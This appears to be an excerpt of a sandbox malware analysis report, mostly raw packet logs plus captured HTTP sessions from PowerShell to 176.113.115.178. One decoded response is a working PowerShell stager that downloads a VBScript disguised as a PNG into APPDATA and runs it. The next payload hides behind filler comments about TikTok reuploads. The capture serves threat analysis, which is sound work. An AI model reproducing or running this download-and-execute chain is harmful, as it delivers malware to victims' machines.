                                                                  Dec 18, 2024 13:49:56.177629948 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.178142071 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.178410053 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.178673983 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.179202080 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.179415941 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.179487944 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.180197001 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.180432081 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.181160927 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.181328058 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.181333065 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.181408882 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.182086945 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.182343960 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.182385921 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.183049917 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.183300018 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.183432102 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.184015989 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.184266090 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.184313059 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.185081959 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.185302019 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.185990095 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.186136007 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.186259985 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.187006950 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.187186003 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.187200069 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.187237024 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.187964916 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.188199043 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.188334942 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.189032078 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.189172983 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.189476013 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.189933062 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.190159082 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.190957069 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.191037893 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.191128016 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.191492081 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.191891909 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.192136049 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.192259073 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.192879915 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.193098068 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.193295956 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.193856001 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.194067001 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.194134951 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.194839954 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.195054054 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.195527077 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.195807934 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.196033001 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.196346998 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.196763039 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.196985006 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.197036028 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.197738886 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.197966099 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.198745966 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.198801041 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.199007034 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.199736118 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.199837923 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.199980974 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.200694084 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.200822115 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.200938940 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.201663971 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.201869011 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.201922894 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.202195883 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.202651024 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.202879906 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.202990055 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.203665972 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.203843117 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.204046965 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.204634905 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.205112934 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.205204010 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.205610991 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.205902100 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.205986977 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.206568003 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.206923962 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.207587004 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.207596064 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.207809925 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.208549023 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.208662987 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.208743095 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.209604025 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.209753990 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.209784985 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.209841013 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.210509062 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.210819960 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.210865021 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.211461067 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.211800098 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.211863041 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.212431908 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.212662935 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.212766886 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.213495970 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.230592012 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.354211092 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.354377985 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.354509115 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.354912043 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.355215073 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.355338097 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.355720043 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.356267929 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.356703043 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.356859922 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.356904030 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.357642889 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.357685089 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.357841969 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.358011961 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.358584881 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.358897924 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.358978987 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.359554052 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.359802961 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.359859943 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.360621929 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.360862017 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.360995054 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.361629009 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.361826897 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.361896038 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.362504005 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.362736940 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.362857103 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.363511086 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.363755941 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.364548922 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.364618063 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.364748001 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.365549088 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.365603924 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.365681887 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.366430044 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.366503000 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.366626024 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.367522001 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.367580891 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.367748022 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.367809057 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.368415117 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.368608952 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.368664980 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.369348049 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.369587898 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.370359898 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.370428085 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.370598078 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.371367931 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.371422052 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.371521950 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.371578932 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.372425079 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.372575998 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.372667074 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.373270035 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.373512983 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.373596907 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.374365091 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.374574900 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.374715090 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.375226974 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.375457048 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.376249075 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.376308918 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.376492977 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.377219915 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.377316952 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.377391100 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.377479076 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.378196955 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.378453016 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.378541946 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.379173994 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.379374981 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.379458904 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.380136013 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.380350113 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.381171942 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.381239891 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.381334066 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.381473064 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.382153034 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.382302999 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.382406950 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.383220911 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.383379936 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.383439064 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.384227037 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.384342909 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.385134935 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.385200024 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.385243893 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.385602951 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.386035919 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.386290073 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.386343956 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.387083054 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.387484074 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.387543917 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.388015032 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.388310909 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.388406992 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.388999939 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.389252901 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.389600039 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:56.389954090 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.390239954 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.390907049 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:56.390986919 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:57.089812040 CET4982280192.168.2.6176.113.115.178

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Dec 18, 2024 13:49:47.624953032 CET1.1.1.1192.168.2.60xf87aNo error (0)g-bing-com.ax-0001.ax-msedge.netax-0001.ax-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                  Dec 18, 2024 13:49:47.624953032 CET1.1.1.1192.168.2.60xf87aNo error (0)ax-0001.ax-msedge.net150.171.27.10A (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 13:49:47.624953032 CET1.1.1.1192.168.2.60xf87aNo error (0)ax-0001.ax-msedge.net150.171.28.10A (IP address)IN (0x0001)false

                                                                  HTTP Request Dependency Graph

                                                                  • 176.113.115.178

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.649714176.113.115.17880936C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 18, 2024 13:49:09.843672991 CET73OUTGET /FF/3.png HTTP/1.1
                                                                  Host: 176.113.115.178
                                                                  Connection: Keep-Alive
                                                                  Dec 18, 2024 13:49:11.214792967 CET1236INHTTP/1.1 404 Not Found
                                                                  Content-Type: text/html
                                                                  Server: Microsoft-IIS/10.0
                                                                  Date: Wed, 18 Dec 2024 12:49:10 GMT
                                                                  Content-Length: 1245
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                  Dec 18, 2024 13:49:11.214809895 CET147INData Raw: 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20
                                                                  Data Ascii: are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.649715176.113.115.17880404C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 18, 2024 13:49:09.844029903 CET73OUTGET /FF/2.png HTTP/1.1
                                                                  Host: 176.113.115.178
                                                                  Connection: Keep-Alive
                                                                  Dec 18, 2024 13:49:11.191220045 CET421INHTTP/1.1 200 OK
                                                                  Content-Type: image/png
                                                                  Last-Modified: Thu, 21 Nov 2024 18:54:18 GMT
                                                                  Accept-Ranges: bytes
                                                                  ETag: "010f4c4463cdb1:0"
                                                                  Server: Microsoft-IIS/10.0
                                                                  Date: Wed, 18 Dec 2024 12:49:10 GMT
                                                                  Content-Length: 197
                                                                  Data Raw: 0d 0a 24 75 72 6c 20 3d 20 22 68 74 74 70 3a 2f 2f 31 37 36 2e 31 31 33 2e 31 31 35 2e 31 37 38 2f 46 46 2f 43 4d 44 2e 70 6e 67 22 0d 0a 24 6f 75 74 70 75 74 20 3d 20 22 24 65 6e 76 3a 41 50 50 44 41 54 41 5c 43 4d 44 2e 76 62 73 22 0d 0a 24 73 74 61 72 74 5f 74 69 6d 65 20 3d 20 47 65 74 2d 44 61 74 65 0d 0a 24 77 63 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 4e 65 74 2e 57 65 62 43 6c 69 65 6e 74 0d 0a 24 77 63 2e 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 28 24 75 72 6c 2c 20 24 6f 75 74 70 75 74 29 0d 0a 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 24 6f 75 74 70 75 74
                                                                  Data Ascii: $url = "http://176.113.115.178/FF/CMD.png"$output = "$env:APPDATA\CMD.vbs"$start_time = Get-Date$wc = New-Object System.Net.WebClient$wc.DownloadFile($url, $output)Start-Process $output
                                                                  Dec 18, 2024 13:49:11.217369080 CET51OUTGET /FF/CMD.png HTTP/1.1
                                                                  Host: 176.113.115.178
                                                                  Dec 18, 2024 13:49:11.657851934 CET1236INHTTP/1.1 200 OK
                                                                  Content-Type: image/png
                                                                  Last-Modified: Thu, 21 Nov 2024 18:48:44 GMT
                                                                  Accept-Ranges: bytes
                                                                  ETag: "0cbafd453cdb1:0"
                                                                  Server: Microsoft-IIS/10.0
                                                                  Date: Wed, 18 Dec 2024 12:49:10 GMT
                                                                  Content-Length: 28112
                                                                  Data Raw: 0d 0a 27 20 20 20 20 49 20 72 65 75 70 6c 6f 61 64 20 76 69 64 65 6f 73 20 74 68 61 74 20 68 61 76 65 20 68 61 64 20 73 65 76 65 72 61 6c 20 6d 69 6c 6c 69 6f 6e 20 76 69 65 77 73 2c 20 62 75 74 20 49 20 68 61 76 65 20 74 68 65 6d 20 67 61 69 6e 69 6e 67 20 6c 65 73 73 20 74 68 61 6e 20 61 20 74 68 6f 75 73 61 6e 64 2c 20 77 68 61 74 20 61 6d 20 49 20 64 6f 69 6e 67 20 77 72 6f 6e 67 3f 20 57 68 79 20 69 73 20 74 68 69 73 20 68 61 70 70 65 6e 69 6e 67 3f 0d 0a 27 49 6d 61 67 69 6e 65 20 69 66 20 65 61 63 68 20 72 65 75 70 6c 6f 61 64 65 64 20 76 69 64 65 6f 20 67 61 69 6e 65 64 20 74 68 65 20 73 61 6d 65 20 6e 75 6d 62 65 72 20 6f 66 20 76 69 65 77 73 20 61 73 20 74 68 65 20 6f 72 69 67 69 6e 61 6c 20 61 6e 64 20 77 61 73 20 75 70 6c 6f 61 64 65 64 20 75 6e 74 69 6c 20 75 73 65 72 73 20 73 69 6d 70 6c 79 20 67 65 74 20 62 6f 72 65 64 2e 20 49 6e 20 73 75 63 68 20 61 20 63 61 73 65 20 54 69 6b 54 6f 6b 20 77 6f 75 6c 64 20 62 65 20 6f 76 65 72 66 6c 6f 77 69 6e 67 20 77 69 74 68 20 64 75 70 6c 69 63 [TRUNCATED]
                                                                  Data Ascii: ' I reupload videos that have had several million views, but I have them gaining less than a thousand, what am I doing wrong? Why is this happening?'Imagine if each reuploaded video gained the same number of views as the original and was uploaded until users simply get bored. In such a case TikTok would be overflowing with duplicates and traffers would be swimming in views. By the way, a couple years ago it was like that.'TikTok, as well as other platforms, is actively fighting plagiarism, improving its algorithms and training AI to prevent content re-posting, both from other platforms and within TikTok itself.'First of all, when a video is uploaded to TikTok, it is instantly processed by (AI) that identifies objects in the video, categorizes it and looks for violations. The video is then compressed, parameters and metadata are changed. If you download and upload that video again, TT immediately recognizes it and your chances of getting recommended go down to zero.'However, that's no
